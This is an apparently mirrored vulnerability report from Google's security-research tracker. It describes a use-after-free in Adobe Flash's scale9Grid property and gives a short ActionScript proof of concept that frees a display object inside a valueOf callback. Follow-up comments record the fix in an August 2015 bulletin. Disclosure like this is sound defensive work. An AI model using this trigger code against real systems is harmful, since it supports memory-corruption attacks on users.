search

AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Adobe Flash: Use-after-free in scale9Grid #380

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
There is a use-after-free issue if the scale9Grid setting is called on an 
object with a member that then frees display item. This issue occurs for both 
MovieClips and Buttons, it needs to be fixed in both classes.

A PoC is as follows:

var n = { valueOf : func };
var o = {x:n, y:0,width:10, height:10}

_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("mymc",1)
mymc.scale9Grid = o

function func() {
    trace("here");
    var t = _global.mc.createTextField("test",1,1,1,2,3)
    t.removeTextField()
    return 7
}

A sample fla and swf is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 14 May 2015 at 12:28

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 15 May 2015 at 9:18

GoogleCodeExporter commented 8 years ago 
This is PSIRT-3712.

Original comment by natashe...@google.com on 19 May 2015 at 5:48

GoogleCodeExporter commented 8 years ago 
Fixed in August bulletin

Original comment by natashe...@google.com on 19 Aug 2015 at 12:19

GoogleCodeExporter commented 8 years ago

Original comment by scvi...@google.com on 20 Aug 2015 at 3:46

GoogleCodeExporter commented 8 years ago 
Do we have a CVE-ID for this vulnerability?

Original comment by segovia....@gmail.com on 20 Aug 2015 at 6:18